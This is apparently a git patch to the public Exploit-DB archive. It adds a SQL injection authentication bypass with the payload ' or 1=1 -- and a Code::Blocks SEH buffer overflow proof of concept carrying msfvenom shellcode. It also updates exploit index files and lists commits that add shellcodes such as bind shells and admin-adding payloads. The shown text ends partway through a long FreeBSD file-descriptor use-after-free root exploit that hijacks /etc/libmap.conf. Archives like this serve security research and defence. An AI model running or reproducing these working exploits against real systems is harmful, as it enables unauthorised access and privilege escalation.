b/exploits/php/webapps/48593.txt new file mode 100644 index 000000000..030e45e0c --- /dev/null +++ b/exploits/php/webapps/48593.txt @@ -0,0 +1,35 @@ +# Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection +# Exploit Author: BLAY ABU SAFIAN (Inveteck Global) +# Website: https://github.com/olotieno/College-Management-System-Php +# Date: 2020-06-16 +# Google Dork: N/A +# Vendor: https://github.com/olotieno/ +# Software Link: https://github.com/olotieno/College-Management-System-Php.git +# Affected Version: N/A +# Patched Version: unpatched +# Category: Web Application +# Tested on: MAC + +The College Management System Php suffers from sql injection vulnerabilities in the index.php page: + +$msg=""; +if(isset($_POST['btn_log'])){ + $uname=$_POST['unametxt']; + $pwd=$_POST['pwdtxt']; + + $sql=mysqli_query($con,"SELECT * FROM users_tbl + WHERE username='$uname' AND password='$pwd' + +SQL injection vulnerability:- +in file index.php data from POST parameter 'unametxt' and 'pwdtxt' are not getting filter before passing into SQL query and hence rising SQL Injection vulnerability + +payload: +' or 1=1 -- + + + +Thank you + +regards +Abu Safian Blay +https://inveteckglobal.com \ No newline at end of file diff --git a/exploits/windows/local/48594.py b/exploits/windows/local/48594.py new file mode 100755 index 000000000..11992f74c --- /dev/null +++ b/exploits/windows/local/48594.py @@ -0,0 +1,108 @@ +# Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC) +# Vendor Homepage: http://www.codeblocks.org/ +# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-06-16 +# Vulnerable Software: Code Blocks +# Version: 17.12 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: codeblocks.py +# 2.- Copy content to clipboard +# 3.- Turn off DEP for codeblocks.exe +# 4.- Open "codeblocks.exe" +# 5.- Go to "File" > "New" > "Project..." +# 6.- Click on "Files" from left box > Select "C/C++ header" > Clickon "Go" > Click on "Next" +# 7.- Paste ClipBoard into the "Filename with fullpath:" . +# 8.- Click on "Finish". +# 9.- Calc.exe runs. + + +################################################################################################################################################# + +#Python "codeblocks.py" Code: + +f= open("codeblocks.txt", "w") + +junk1="A" * 2006 + + +nseh="\x61\x62" #popad / align + + +#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\CodeBlocks\codeblocks.exe +seh="\xe0\x50" + +ven = "\x62" #align +ven +="\x53" #push ebx +ven += "\x62" #align +ven += "\x58" #pop eax +ven += "\x62" #align +ven += "\x05\x14\x11" #add eax, 0x11001400 +ven += "\x62" #align +ven += "\x2d\x13\x11" #sub eax, 0x11001300 +ven += "\x62" #align + +ven += "\x50" #push eax +ven += "\x62" #align +ven += "\xc3" #ret + +junk2="\x41" * 108 #required to make sure shellcode = eax + +#msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX +buf = "" +buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72" +buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50" +buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b" +buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52" +buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31" +buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c" +buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37" +buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a" +buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71" +buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34" +buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79" +buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52" +buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71" +buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30" +buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d" +buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c" +buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b" +buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b" +buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34" +buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32" +buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b" +buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64" +buf += "\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30" +buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66" +buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78" +buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d" +buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70" +buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52" +buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43" +buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53" +buf += "\x35\x6d\x30\x41\x41" + + + + +junk3 = "\x62" * 5000 #padding to crash + + + +payload = junk1 + nseh + seh + ven + junk2 + buf +junk3 + +f.write(payload) +f.close \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index cc0ec866d..f01140a68 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11095,6 +11095,7 @@ id,file,description,date,author,type,platform,port 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows, 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows, 48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows, +48594,exploits/windows/local/48594.py,"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)",2020-06-17,"Paras Bhatia",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42811,3 +42812,5 @@ id,file,description,date,author,type,platform,port 48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple, 48588,exploits/hardware/webapps/48588.py,"Netgear R7000 Router - Remote Code Execution",2020-06-15,grimm-co,webapps,hardware, 48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php, +48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php, +48595,exploits/multiple/webapps/48595.txt,"OpenCTI 3.3.1 - Directory Traversal",2020-06-17,"Raif Berkay Dincel",webapps,multiple, From 1979df6cb341650aaf7319d705655436defcce8c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 19 Jun 2020 05:02:01 +0000 Subject: [PATCH 17/17] DB: 2020-06-19 51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes) --- exploits/android/remote/47157.txt | 12 + exploits/freebsd/local/47081.sh | 678 +++++++++++++++++++++++++++ exploits/hardware/remote/47083.py | 51 ++ exploits/ios/local/47409.txt | 18 + exploits/jsp/webapps/47391.go | 71 +++ exploits/linux/dos/44994.html | 30 ++ exploits/linux/remote/48196.txt | 131 ++++++ exploits/linux/webapps/47330.rb | 170 +++++++ exploits/multiple/webapps/47342.html | 233 +++++++++ exploits/multiple/webapps/47449.txt | 204 ++++++++ exploits/php/webapps/47161.php | 109 +++++ exploits/php/webapps/47299.php | 219 +++++++++ exploits/php/webapps/47359.txt | 97 ++++ exploits/php/webapps/47413.py | 167 +++++++ exploits/php/webapps/47443.rb | 238 ++++++++++ exploits/php/webapps/48023.txt | 28 ++ exploits/php/webapps/48058.txt | 39 ++ exploits/php/webapps/48059.txt | 18 + exploits/php/webapps/48061.txt | 14 + exploits/php/webapps/48062.txt | 39 ++ exploits/php/webapps/48065.txt | 19 + exploits/php/webapps/48088.txt | 29 ++ exploits/php/webapps/48093.txt | 31 ++ exploits/php/webapps/48198.txt | 43 ++ exploits/php/webapps/48199.txt | 189 ++++++++ exploits/php/webapps/48200.txt | 319 +++++++++++++ exploits/php/webapps/48213.txt | 23 + exploits/php/webapps/48222.txt | 32 ++ exploits/php/webapps/48230.txt | 191 ++++++++ exploits/php/webapps/48238.txt | 39 ++ exploits/php/webapps/48278.txt | 60 +++ exploits/php/webapps/48307.txt | 30 ++ exploits/php/webapps/48347.txt | 121 +++++ exploits/php/webapps/48349.py | 95 ++++ exploits/php/webapps/48374.txt | 49 ++ exploits/php/webapps/48605.txt | 20 + exploits/watchos/dos/47404.pl | 27 ++ exploits/watchos/dos/47406.py | 30 ++ exploits/windows/dos/47393.txt | 35 ++ exploits/windows/dos/47795.py | 26 + exploits/windows/dos/47801.py | 21 + exploits/windows/dos/47849.py | 33 ++ exploits/windows/dos/47872.py | 33 ++ exploits/windows/dos/47963.cpp | 135 ++++++ exploits/windows/local/47411.py | 87 ++++ exploits/windows/local/47476.py | 33 ++ exploits/windows/local/47981.txt | 620 ++++++++++++++++++++++++ exploits/windows/remote/48194.txt | 48 ++ exploits/windows/remote/48195.txt | 48 ++ exploits/xml/local/47526.txt | 38 ++ files_exploits.csv | 52 +- files_shellcodes.csv | 5 +- shellcodes/linux/47481.c | 105 +++++ 53 files changed, 5229 insertions(+), 3 deletions(-) create mode 100644 exploits/android/remote/47157.txt create mode 100755 exploits/freebsd/local/47081.sh create mode 100755 exploits/hardware/remote/47083.py create mode 100644 exploits/ios/local/47409.txt create mode 100755 exploits/jsp/webapps/47391.go create mode 100644 exploits/linux/dos/44994.html create mode 100644 exploits/linux/remote/48196.txt create mode 100755 exploits/linux/webapps/47330.rb create mode 100644 exploits/multiple/webapps/47342.html create mode 100644 exploits/multiple/webapps/47449.txt create mode 100644 exploits/php/webapps/47161.php create mode 100644 exploits/php/webapps/47299.php create mode 100644 exploits/php/webapps/47359.txt create mode 100755 exploits/php/webapps/47413.py create mode 100755 exploits/php/webapps/47443.rb create mode 100644 exploits/php/webapps/48023.txt create mode 100644 exploits/php/webapps/48058.txt create mode 100644 exploits/php/webapps/48059.txt create mode 100644 exploits/php/webapps/48061.txt create mode 100644 exploits/php/webapps/48062.txt create mode 100644 exploits/php/webapps/48065.txt create mode 100644 exploits/php/webapps/48088.txt create mode 100644 exploits/php/webapps/48093.txt create mode 100644 exploits/php/webapps/48198.txt create mode 100644 exploits/php/webapps/48199.txt create mode 100644 exploits/php/webapps/48200.txt create mode 100644 exploits/php/webapps/48213.txt create mode 100644 exploits/php/webapps/48222.txt create mode 100644 exploits/php/webapps/48230.txt create mode 100644 exploits/php/webapps/48238.txt create mode 100644 exploits/php/webapps/48278.txt create mode 100644 exploits/php/webapps/48307.txt create mode 100644 exploits/php/webapps/48347.txt create mode 100755 exploits/php/webapps/48349.py create mode 100644 exploits/php/webapps/48374.txt create mode 100644 exploits/php/webapps/48605.txt create mode 100755 exploits/watchos/dos/47404.pl create mode 100755 exploits/watchos/dos/47406.py create mode 100644 exploits/windows/dos/47393.txt create mode 100755 exploits/windows/dos/47795.py create mode 100755 exploits/windows/dos/47801.py create mode 100755 exploits/windows/dos/47849.py create mode 100755 exploits/windows/dos/47872.py create mode 100644 exploits/windows/dos/47963.cpp create mode 100755 exploits/windows/local/47411.py create mode 100755 exploits/windows/local/47476.py create mode 100644 exploits/windows/local/47981.txt create mode 100644 exploits/windows/remote/48194.txt create mode 100644 exploits/windows/remote/48195.txt create mode 100644 exploits/xml/local/47526.txt create mode 100644 shellcodes/linux/47481.c diff --git a/exploits/android/remote/47157.txt b/exploits/android/remote/47157.txt new file mode 100644 index 000000000..519c500d7 --- /dev/null +++ b/exploits/android/remote/47157.txt @@ -0,0 +1,12 @@ +# Exploit Title: Android 7-9 - Remote Code Execution +# Date: [date] +# Exploit Author: Marcin Kozlowski +# Version: 7-9 +# Tested on: Android +# CVE : 2019-2107 + +CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... +With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2) + +POC: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47157.zip \ No newline at end of file diff --git a/exploits/freebsd/local/47081.sh b/exploits/freebsd/local/47081.sh new file mode 100755 index 000000000..e9aaa1d88 --- /dev/null +++ b/exploits/freebsd/local/47081.sh @@ -0,0 +1,678 @@ +#!/bin/sh + +# Exploit script for FreeBSD-SA-19:02.fd +# +# Author: Karsten König of Secfault Security +# Contact: karsten@secfault-security.com +# Twitter: @gr4yf0x +# Kudos: Maik, greg and Dirk for discussion and inspiration +# +# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper + +echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security" + +umask 0000 + +if [ ! -f /etc/libmap.conf ]; then + echo "[!] libmap.conf has to exist" + exit +fi + +cp /etc/libmap.conf ./ + +cat > heavy_cyber_weapon.c << EOF +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define N_FDS 0xfe +#define N_OPEN 0x2 + +#define N 1000000 +#define NUM_THREADS 400 +#define NUM_FORKS 3 +#define FILE_SIZE 1024 +#define CHUNK_SIZE 1 +#define N_FILES 25 + +#define SERVER_PATH "/tmp/sync_forks" +#define DEFAULT_PATH "/tmp/pwn" +#define HAMMER_PATH "/tmp/pwn2" +#define ATTACK_PATH "/etc/libmap.conf" + +#define HOOK_LIB "libutil.so.9" +#define ATTACK_LIB "/tmp/libno_ex.so.1.0" + +#define CORE_0 0 +#define CORE_1 1 + +#define MAX_TRIES 500 + +struct thread_data { + int fd; + int fd2; +}; + +pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx; +pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond; + +int send_recv(int fd, int sv[2], int n_fds) { + int ret, i; + struct iovec iov; + struct msghdr msg; + struct cmsghdr *cmh; + char cmsg[CMSG_SPACE(sizeof(int)*n_fds)]; + int *fds; char buf[1]; + + iov.iov_base = "a"; + iov.iov_len = 1; + + msg.msg_name = NULL; + msg.msg_namelen = 0; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cmsg; + msg.msg_controllen = CMSG_LEN(sizeof(int)*n_fds); + msg.msg_flags = 0; + + cmh = CMSG_FIRSTHDR(&msg); + cmh->cmsg_len = CMSG_LEN(sizeof(int)*n_fds); + cmh->cmsg_level = SOL_SOCKET; + cmh->cmsg_type = SCM_RIGHTS; + fds = (int *)CMSG_DATA(cmsg); + for (i = 0; i < n_fds; i++) { + fds[i] = fd; + } + + ret = sendmsg(sv[0], &msg, 0); + if (ret == -1) { + return 1; + } + + iov.iov_base = buf; + msg.msg_name = NULL; + msg.msg_namelen = 0; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cmh; + msg.msg_controllen = CMSG_SPACE(0); + msg.msg_flags = 0; + + ret = recvmsg(sv[1], &msg, 0); + if (ret == -1) { + return 1; + } + + return 0; +} + +int open_tmp(char *path) +{ + int fd; + char *real_path; + + if (path != NULL) { + real_path = malloc(strlen(path) + 1); + strcpy(real_path, path); + } + else { + real_path = malloc(strlen(DEFAULT_PATH) + 1); + strcpy(real_path, DEFAULT_PATH); + } + + if ((fd = open(real_path, O_RDWR | O_CREAT)) == -1) { + perror("[!] open"); + exit(1); + } + + fchmod(fd, 0700); + + return fd; +} + +void prepare_domain_socket(struct sockaddr_un *remote, char *path) { + bzero(remote, sizeof(struct sockaddr_un)); + remote->sun_family = AF_UNIX; + strncpy(remote->sun_path, path, sizeof(remote->sun_path)); +} + +int bind_domain_socket(struct sockaddr_un *remote) { + int server_socket; + + if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) { + perror("[!] socket"); + exit(1); + } + + if (bind(server_socket, + (struct sockaddr *) remote, + sizeof(struct sockaddr_un)) != 0) { + perror("[!] bind"); + exit(1); + } + + return server_socket; +} + +int connect_domain_socket_client() { + int client_socket; + + if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) { + perror("[!] socket"); + exit(1); + } + + return client_socket; +} + +// Prevent panic at termination because f_count of the +// corrupted struct file is 0 at the moment this function +// is used but fd2 still points to the struct, hence fdrop() +// is called at exit and will panic because f_count will +// be below 0 +// +// So we just use our known primitive to increase f_count +void prevent_panic(int sv[2], int fd) +{ + send_recv(fd, sv, 0xfe); +} + +int stick_thread_to_core(int core) { + /* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */ + /* if (core_id < 0 || core_id >= num_cores) */ + /* return EINVAL; */ + cpuset_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(core, &cpuset); + + pthread_t current_thread = pthread_self(); + return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset); +} + +void *trigger_uaf(void *thread_args) { + struct thread_data *thread_data; + int fd, fd2; + + if (stick_thread_to_core(CORE_0) != 0) { + perror("[!] [!] trigger_uaf: Could not stick thread to core"); + } + + thread_data = (struct thread_data *)thread_args; + fd = thread_data->fd; + fd2 = thread_data->fd2; + + printf("[+] trigger_uaf: fd: %d\n", fd); + printf("[+] trigger_uaf: fd2: %d\n", fd2); + + printf("[+] trigger_uaf: Waiting for start signal from monitor\n"); + pthread_mutex_lock(&trigger_mtx); + pthread_cond_wait(&trigger_cond, &trigger_mtx); + + usleep(40); + + // Close to fds to trigger uaf + // + // This assumes that fget_write() in kern_writev() + // was already successful! + // + // Otherwise kernel panic is triggered + // + // refcount = 2 (primitive+fget_write) + close(fd); + close(fd2); + // refcount = 0 => free + fd = open(ATTACK_PATH, O_RDONLY); + // refcount = 1 + + printf("[+] trigger_uaf: Opened read-only file, now hope\n"); + printf("[+] trigger_uaf: Exit\n"); + + pthread_exit(NULL); +} + +void *hammer(void *arg) { + int i, j, k, client_socket, ret; + char buf[FILE_SIZE], sync_buf[3]; + FILE *fd[N_FILES]; + struct sockaddr_un remote; + + prepare_domain_socket(&remote, SERVER_PATH); + client_socket = connect_domain_socket_client(); + strncpy(sync_buf, "1\n", 3); + + for (i = 0; i < N_FILES; i++) { + unlink(HAMMER_PATH); + if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) { + perror("[!] fopen"); + exit(1); + } + } + + for (i = 0; i < FILE_SIZE; i++) { + buf[i] = 'a'; + } + + pthread_mutex_lock(&hammer_mtx); + + // Sometimes sendto() fails because + // no free buffer is available + for (;;) { + if (sendto(client_socket, + sync_buf, + strlen(sync_buf), 0, + (struct sockaddr *) &remote, + sizeof(remote)) != -1) { + break; + } + } + + pthread_cond_wait(&hammer_cond, &hammer_mtx); + pthread_mutex_unlock(&hammer_mtx); + + for (i = 0; i < N; i++) { + for (k = 0; k < N_FILES; k++) { + rewind(fd[k]); + } + for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) { + for (k = 0; k < N_FILES; k++) { + if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) { + perror("[!] fwrite"); + exit(1); + } + } + fflush(NULL); + } + } + + pthread_exit(NULL); +} + +// Works on UFS only +void *monitor_dirty_buffers(void *arg) { + int hidirtybuffers, numdirtybuffers; + size_t len; + + len = sizeof(int); + + if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) { + perror("[!] sysctlbyname hidirtybuffers"); + exit(1); + }; + printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers); + + while(1) { + sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0); + if (numdirtybuffers >= hidirtybuffers) { + pthread_cond_signal(&write_cond); + pthread_cond_signal(&trigger_cond); + printf("[+] monitor: Reached hidirtybuffers watermark\n"); + break; + } + } + + pthread_exit(NULL); +} + +int check_write(int fd) { + char buf[256]; + int nbytes; + struct stat st; + + printf("[+] check_write\n"); + stat(DEFAULT_PATH, &st); + printf("[+] %s size: %ld\n", DEFAULT_PATH, st.st_size); + + stat(ATTACK_PATH, &st); + printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size); + + nbytes = read(fd, buf, strlen(HOOK_LIB)); + printf("[+] Read bytes: %d\n", nbytes); + if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) { + return 1; + } + else if (nbytes < 0) { + perror("[!] check_write:read"); + printf("[!] check_write:Cannot check if it worked!"); + return 1; + } + + return 0; +} + +void *write_to_file(void *thread_args) { + int fd, fd2, nbytes; + int *fd_ptr; + char buf[256]; + struct thread_data *thread_data; + + if (stick_thread_to_core(CORE_1) != 0) { + perror("[!] write_to_file: Could not stick thread to core"); + } + + fd_ptr = (int *) malloc(sizeof(int)); + + thread_data = (struct thread_data *)thread_args; + fd = thread_data->fd; + fd2 = open(ATTACK_PATH, O_RDONLY); + + printf("[+] write_to_file: Wait for signal from monitor\n"); + pthread_mutex_lock(&write_mtx); + pthread_cond_wait(&write_cond, &write_mtx); + + snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB); + nbytes = write(fd, buf, strlen(buf)); + + // Reopen directly after write to prevent panic later + // + // After the write f_count == 0 because after trigger_uaf() + // opened the read-only file, f_count == 1 and write() + // calls fdrop() at the end + // + // => f_count == 0 + // + // A direct open hopefully assigns the now again free file + // object to fd so that we can prevent the panic with our + // increment primitive. + if ((fd = open_tmp(NULL)) == -1) + perror("[!] write_to_file: open_tmp"); + *fd_ptr = fd; + + if (nbytes < 0) { + perror("[!] [!] write_to_file:write"); + } else if (nbytes > 0) { + printf("[+] write_to_file: We have written something...\n"); + if (check_write(fd2) > 0) + printf("[+] write_to_file: It (probably) worked!\n"); + else + printf("[!] write_to_file: It worked not :(\n"); + } + + printf("[+] write_to_file: Exit\n"); + pthread_exit(fd_ptr); +} + +void prepare(int sv[2], int fds[2]) { + int fd, fd2, i; + + printf("[+] Start UaF preparation\n"); + printf("[+] This can take a while\n"); + + // Get a single file descriptor to send via the socket + if ((fd = open_tmp(NULL)) == -1) { + perror("[!] open_tmp"); + exit(1); + } + + if ((fd2 = dup(fd)) == -1) { + perror("[!] dup"); + exit(1); + } + + // fp->f_count will increment by 0xfe in one iteration + // doing this 16909320 times will lead to + // f_count = 16909320 * 0xfe + 2 = 0xfffffff2 + // Note the 2 because of the former call of dup() and + // the first open(). + // + // To test our trigger we can send 0xd more fd's what + // would to an f_count of 0 when fdclose() is called in + // m_dispose_extcontrolm. fdrop() will reduce f_count to + // 0xffffffff = -1 and ultimately panic when _fdrop() is + // called because the latter asserts that f_count is 0. + // _fdrop is called in the first place because + // refcount_release() only checks that f_count is less or + // equal 1 to recognize the last reference. + // + // If we want to trigger the free without panic, we have + // to send 0xf fds and close an own what will lead to an + // fdrop() call without panic as f_count is 1 and reduced + // to 0 by close(). The unclosed descriptor references now + // a free 'struct file'. + for (i = 0; i < 16909320; i++) { + if (i % 1690930 == 0) { + printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093)); + } + + if (send_recv(fd, sv, N_FDS)) { + perror("[!] prepare:send_recv"); + exit(1); + } + } + if (send_recv(fd, sv, 0xf)) { + perror("[!] prepare:send_recv"); + exit(1); + } + + fds[0] = fd; + fds[1] = fd2; + + printf("[+] Finished UaF preparation\n"); +} + +void read_thread_status(int server_socket) { + int bytes_rec, count; + struct sockaddr_un client; + socklen_t len; + char buf[256]; + struct timeval tv; + + tv.tv_sec = 10; + tv.tv_usec = 0; + setsockopt(server_socket, + SOL_SOCKET, SO_RCVTIMEO, + (const char*)&tv, sizeof tv); + + for (count = 0; count < 